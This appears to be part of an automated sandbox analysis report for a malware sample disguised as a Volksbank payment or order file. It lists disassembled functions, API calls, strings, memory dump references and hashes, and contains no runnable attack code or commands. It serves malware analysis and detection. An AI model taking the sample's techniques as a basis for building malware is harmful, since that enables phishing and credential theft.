                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Menu$Window$CreateDestroyDialogItemParammemset$ChildCountDesktopEnumInfoLoadTextWindows_snwprintfwcschr
                                                                                                                                                                                                                                          • String ID: caption
                                                                                                                                                                                                                                          • API String ID: 973020956-4135340389
                                                                                                                                                                                                                                          • Opcode ID: e527282329e758372625c7aced3bf19f10c29faef3bcce853f9f760d7f68934a
                                                                                                                                                                                                                                          • Instruction ID: d77e6bedd7727d4aace6f5c0bd160524984489d6dc7b24eaa8e7ecc9459ec1fc
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e527282329e758372625c7aced3bf19f10c29faef3bcce853f9f760d7f68934a
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 60319072900208BFEF11AF91DC85EAA3B78FF04315F10843AF909A61A1D7799D58CF59
                                                                                                                                                                                                                                          Function 00410A60 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 90COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00410ADD
                                                                                                                                                                                                                                          • <table dir="rtl"><tr><td>, xrefs: 00410B00
                                                                                                                                                                                                                                          • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 00410A70
                                                                                                                                                                                                                                          • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 00410B3C
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: memset$_snwprintf$wcscpy
                                                                                                                                                                                                                                          • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>
                                                                                                                                                                                                                                          • API String ID: 1283228442-2366825230
                                                                                                                                                                                                                                          • Opcode ID: aad372153645cc2b66520eb5eda5f4843b54733af1e5b0f3fbeb8aacc0aad8fb
                                                                                                                                                                                                                                          • Instruction ID: da896b014e5ee892582fb8e7d48e4383de9842bc572d8210300f5843ce7472f7
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: aad372153645cc2b66520eb5eda5f4843b54733af1e5b0f3fbeb8aacc0aad8fb
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5C2182B69002197BDB21AB95CC41EDE77BCAF08785F0040ABF549D3151DA789F888BA9
                                                                                                                                                                                                                                          Function 00413959 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 82COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • wcschr.MSVCRT ref: 00413972
                                                                                                                                                                                                                                          • wcscpy.MSVCRT ref: 00413982
                                                                                                                                                                                                                                            • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                                                                                                                                                                                                                            • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                                                                                                                                                                                                                            • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                                                                                                                                                                                                                                          • wcscpy.MSVCRT ref: 004139D1
                                                                                                                                                                                                                                          • wcscat.MSVCRT ref: 004139DC
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 004139B8
                                                                                                                                                                                                                                            • Part of subcall function 00409DD5: GetWindowsDirectoryW.KERNEL32(0045DC58,00000104,?,00413A11,?,?,00000000,00000208,?), ref: 00409DEB
                                                                                                                                                                                                                                            • Part of subcall function 00409DD5: wcscpy.MSVCRT ref: 00409DFB
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 00413A00
                                                                                                                                                                                                                                          • memcpy.MSVCRT(?,?,00000004,?,?,00000000,00000208,?), ref: 00413A1B
                                                                                                                                                                                                                                          • wcscat.MSVCRT ref: 00413A27
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: wcscpy$memsetwcscatwcslen$DirectoryWindows_memicmpmemcpywcschr
                                                                                                                                                                                                                                          • String ID: \systemroot
                                                                                                                                                                                                                                          • API String ID: 4173585201-1821301763
                                                                                                                                                                                                                                          • Opcode ID: 98bce9d9e9325d6f39714f6b424e1477d6b518cde7e6df5d8c0f4db39efede23
                                                                                                                                                                                                                                          • Instruction ID: a9582ad2fab6187976d7b5f1d827ce349b207672d34ede1993470c6c3fb504e1
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 98bce9d9e9325d6f39714f6b424e1477d6b518cde7e6df5d8c0f4db39efede23
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7D21F6F68053146AE720FB619C86EEF73EC9F06719F20415FF115A20C6EA7C9A844B5E
                                                                                                                                                                                                                                          Function 00414BB0 Relevance: 16.6, APIs: 1, Strings: 10, Instructions: 50COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: wcscpy
                                                                                                                                                                                                                                          • String ID: AppData$Common Desktop$Common Programs$Common Start Menu$Common Startup$Desktop$Favorites$Programs$Start Menu$Startup
                                                                                                                                                                                                                                          • API String ID: 1284135714-318151290
                                                                                                                                                                                                                                          • Opcode ID: 0a607774d7c303284e27c7b04db276e27a23f0d6d0cd9d042bad1c6033713506
                                                                                                                                                                                                                                          • Instruction ID: e2253d4fd864bfabc2f945990654e2d0feb0e3e4f5de9ed447e77a37a808a444
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0a607774d7c303284e27c7b04db276e27a23f0d6d0cd9d042bad1c6033713506
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 04F0127526EA4161142406240E0DEF75509D0D575F3F74A537A02E89D6FCCDDEC6609F
                                                                                                                                                                                                                                          Function 0040D2AB Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 101windowCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Menu$Itemmemset$CountInfoModifywcscatwcschr
                                                                                                                                                                                                                                          • String ID: 0$6
                                                                                                                                                                                                                                          • API String ID: 4066108131-3849865405
                                                                                                                                                                                                                                          • Opcode ID: fc96a420e8f8bdf87928e34e657a0b6c1b8723afb93dcca2deed5b8d5a3436dd
                                                                                                                                                                                                                                          • Instruction ID: 23fd2219eb4cf2a86962fa47610fb6a66e7712bfbd77636794901fa2ff6d3352
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fc96a420e8f8bdf87928e34e657a0b6c1b8723afb93dcca2deed5b8d5a3436dd
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1C317C72808344AFDB209F95D84499FB7E8FF84314F00493EFA48A2291D775D949CB5B
                                                                                                                                                                                                                                          Function 004082C7 Relevance: 15.2, APIs: 10, Instructions: 229COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 004082EF
                                                                                                                                                                                                                                            • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 00408362
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 00408377
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: memset$ByteCharMultiWide
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 290601579-0
                                                                                                                                                                                                                                          • Opcode ID: aaab377460abc89c7af8afd87b5e46c7bf1c7e9fcd5a4a68ffd212283bf1634f
                                                                                                                                                                                                                                          • Instruction ID: eff1c4cb9ad8ed09cf65616da307521f953f8cb6273bc8e87bbfe44e88666a06
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: aaab377460abc89c7af8afd87b5e46c7bf1c7e9fcd5a4a68ffd212283bf1634f
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E1716C72E0421DAFEF10EFA1EC82AEDB7B9EF04314F14406FE104B6191EB795A458B59
                                                                                                                                                                                                                                          Function 00444E84 Relevance: 15.2, APIs: 8, Strings: 2, Instructions: 183COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • memchr.MSVCRT ref: 00444EBF
                                                                                                                                                                                                                                          • memcpy.MSVCRT(?,0044EB0C,0000000B,?,?,?,00000000,00000000,00000000), ref: 00444F63
                                                                                                                                                                                                                                          • memcpy.MSVCRT(?,00000001,00000008,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00444F75
                                                                                                                                                                                                                                          • memcpy.MSVCRT(?,?,00000010,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00444F9D
                                                                                                                                                                                                                                          • memcpy.MSVCRT(?,0044EB0C,0000000B), ref: 00444FAF
                                                                                                                                                                                                                                          • memcpy.MSVCRT(?,00000001,00000008), ref: 00444FC1
                                                                                                                                                                                                                                          • memcpy.MSVCRT(PD,?,00000008,?,?), ref: 00445010
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 0044505E
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: memcpy$memchrmemset
                                                                                                                                                                                                                                          • String ID: PD$PD
                                                                                                                                                                                                                                          • API String ID: 1581201632-2312785699
                                                                                                                                                                                                                                          • Opcode ID: 0e910d3a8e1f8c818d40de505798e2cb595e2298e7188f8e397b04e98a163445
                                                                                                                                                                                                                                          • Instruction ID: 10fb1f61a141a907ee6ef334180a592a84e160db04a0c58349e49e3250f7ff3f
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0e910d3a8e1f8c818d40de505798e2cb595e2298e7188f8e397b04e98a163445
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8D5192719002196BDF10EF69CC85EEEBBBCAF45304F0444ABE555E7246E738E648CBA4
                                                                                                                                                                                                                                          Function 00409F42 Relevance: 15.1, APIs: 10, Instructions: 103COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetSystemMetrics.USER32(00000011), ref: 00409F5B
                                                                                                                                                                                                                                          • GetSystemMetrics.USER32(00000010), ref: 00409F61
                                                                                                                                                                                                                                          • GetDC.USER32(00000000), ref: 00409F6E
                                                                                                                                                                                                                                          • GetDeviceCaps.GDI32(00000000,00000008), ref: 00409F7F
                                                                                                                                                                                                                                          • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00409F86
                                                                                                                                                                                                                                          • ReleaseDC.USER32(00000000,00000000), ref: 00409F8D
                                                                                                                                                                                                                                          • GetWindowRect.USER32(?,?), ref: 00409FA0
                                                                                                                                                                                                                                          • GetParent.USER32(?), ref: 00409FA5
                                                                                                                                                                                                                                          • GetWindowRect.USER32(00000000,00000000), ref: 00409FC2
                                                                                                                                                                                                                                          • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 0040A021
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Window$CapsDeviceMetricsRectSystem$MoveParentRelease
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2163313125-0
                                                                                                                                                                                                                                          • Opcode ID: d78dd9667733c118ca5f823c40f75fbf68f042a28012a42387a4e68ecbaebf7d
                                                                                                                                                                                                                                          • Instruction ID: e27d49e141fc924f5dc8bb17b5c2b7dfe0ac862298cc10f95babd1b5c1aaa95e
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d78dd9667733c118ca5f823c40f75fbf68f042a28012a42387a4e68ecbaebf7d
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 66318475A00209AFDF14CFB9CD85AEEBBB9FB48354F050579E901F3290DA70ED458A50
                                                                                                                                                                                                                                          Function 004028E7 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 190COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: free$wcslen
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3592753638-3916222277
                                                                                                                                                                                                                                          • Opcode ID: ee4a635328ec67d54f876bdb2dea934223b4b651374da98f2fba9a82a9ef0b7d
                                                                                                                                                                                                                                          • Instruction ID: 6c84a66137f0c35b9d0eb965e4703c645d554f15bb1c6f80accdbf0b715e4580
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ee4a635328ec67d54f876bdb2dea934223b4b651374da98f2fba9a82a9ef0b7d
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 78614A70E0421ADADF28AF95E6485EEB771FF04315F60807BE411B62D1EBB84981CB5D
                                                                                                                                                                                                                                          Function 0040A45A Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 65COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040A47B
                                                                                                                                                                                                                                          • _snwprintf.MSVCRT ref: 0040A4AE
                                                                                                                                                                                                                                          • wcslen.MSVCRT ref: 0040A4BA
                                                                                                                                                                                                                                          • memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                                                                                                                                                                                          • wcslen.MSVCRT ref: 0040A4E0
                                                                                                                                                                                                                                          • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: memcpywcslen$_snwprintfmemset
                                                                                                                                                                                                                                          • String ID: %s (%s)$YV@
                                                                                                                                                                                                                                          • API String ID: 3979103747-598926743
                                                                                                                                                                                                                                          • Opcode ID: 1cd29c0c96bb3ddeb02ffde04bffb630c2350d0f86c95190f97a15d0a128dfe3
                                                                                                                                                                                                                                          • Instruction ID: 06bfc13611ed198a4270a5cd43788582667178ba612a9453d6f3368808cd6753
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1cd29c0c96bb3ddeb02ffde04bffb630c2350d0f86c95190f97a15d0a128dfe3
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 31216F72900219BBDF21DF55CC45D8BB7B8BF04318F018466E948AB106DB74EA188BD9
                                                                                                                                                                                                                                          Function 004044A4 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 52libraryloaderwindowCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • LoadLibraryW.KERNEL32(comctl32.dll,00000000,?,00000002,?,?,?,00412785,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004044C3
                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000,?,00000002,?,?,?,00412785,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004044E9
                                                                                                                                                                                                                                          • MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Library$AddressFreeLoadMessageProc
                                                                                                                                                                                                                                          • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                                                                                                                                                                                                          • API String ID: 2780580303-317687271
                                                                                                                                                                                                                                          • Opcode ID: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                                                                                                                                                                                                                          • Instruction ID: 703d86131c3dcb59aab6256491fb2853d543806c906e0642a055f98632e98cc8
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B201D6757502217BE7112FB69C49F7B7A9CFF82749B000035E601E2180EAB8D901926D
                                                                                                                                                                                                                                          Function 0040A661 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52librarywindowCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002,?,00000000,?,?,00409764,?,00000000,?,00410669,00000000,?,00412758,00000000), ref: 0040A686
                                                                                                                                                                                                                                          • FormatMessageW.KERNEL32(00001100,00000000,?,00000400,00000000,00000000,00000000,?,00000000,?,?,00409764,?,00000000,?,00410669), ref: 0040A6A4
                                                                                                                                                                                                                                          • wcslen.MSVCRT ref: 0040A6B1
                                                                                                                                                                                                                                          • wcscpy.MSVCRT ref: 0040A6C1
                                                                                                                                                                                                                                          • LocalFree.KERNEL32(00000000,?,00000400,00000000,00000000,00000000,?,00000000,?,?,00409764,?,00000000,?,00410669,00000000), ref: 0040A6CB
                                                                                                                                                                                                                                          • wcscpy.MSVCRT ref: 0040A6DB
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: wcscpy$FormatFreeLibraryLoadLocalMessagewcslen
                                                                                                                                                                                                                                          • String ID: Unknown Error$netmsg.dll
                                                                                                                                                                                                                                          • API String ID: 2767993716-572158859
                                                                                                                                                                                                                                          • Opcode ID: 5982e7e4988f8d3682e164896efd2193f6d57f3c4e1bf6f54fb8b809858ad133
                                                                                                                                                                                                                                          • Instruction ID: f30f617898fcbe25dfcd40b25f3134c3ee1324ef56ff669fd92f7ad18b117fee
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5982e7e4988f8d3682e164896efd2193f6d57f3c4e1bf6f54fb8b809858ad133
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 77014772104214BFE7151B61EC46E9F7B3DEF06795F24043AF902B10D0DA7A5E10D69D
                                                                                                                                                                                                                                          Function 0040DAE1 Relevance: 14.0, APIs: 3, Strings: 5, Instructions: 42COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                                                                                                                                                                                          • wcscpy.MSVCRT ref: 0040DAFB
                                                                                                                                                                                                                                          • wcscpy.MSVCRT ref: 0040DB0B
                                                                                                                                                                                                                                          • GetPrivateProfileIntW.KERNEL32(0045D668,rtl,00000000,0045D458), ref: 0040DB1C
                                                                                                                                                                                                                                            • Part of subcall function 0040D65D: GetPrivateProfileStringW.KERNEL32(0045D668,?,0044E518,0045D6F8,?,0045D458), ref: 0040D679
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: PrivateProfilewcscpy$AttributesFileString
                                                                                                                                                                                                                                          • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                                                                                                                                                                                                                          • API String ID: 3176057301-2039793938
                                                                                                                                                                                                                                          • Opcode ID: 19b23b35163b1b9442cb05249b6519e0ec66bb1c0419b9cd6882ee6235bf6311
                                                                                                                                                                                                                                          • Instruction ID: a06b33177ff8c9e83df2ed587696004ed0fecc3b70d630751f385571f4afffd7
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 19b23b35163b1b9442cb05249b6519e0ec66bb1c0419b9cd6882ee6235bf6311
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A8F0F661EC061236D2213A761C07F2E26149FA3B93F05447BBC08771C7CA7E4A4DC69E
                                                                                                                                                                                                                                          Function 0042F5F4 Relevance: 13.8, APIs: 2, Strings: 7, Instructions: 250COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          • database %s is already in use, xrefs: 0042F6C5
                                                                                                                                                                                                                                          • cannot ATTACH database within transaction, xrefs: 0042F663
                                                                                                                                                                                                                                          • attached databases must use the same text encoding as main database, xrefs: 0042F76F
                                                                                                                                                                                                                                          • out of memory, xrefs: 0042F865
                                                                                                                                                                                                                                          • database is already attached, xrefs: 0042F721
                                                                                                                                                                                                                                          • unable to open database: %s, xrefs: 0042F84E
                                                                                                                                                                                                                                          • too many attached databases - max %d, xrefs: 0042F64D
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: memcpymemset
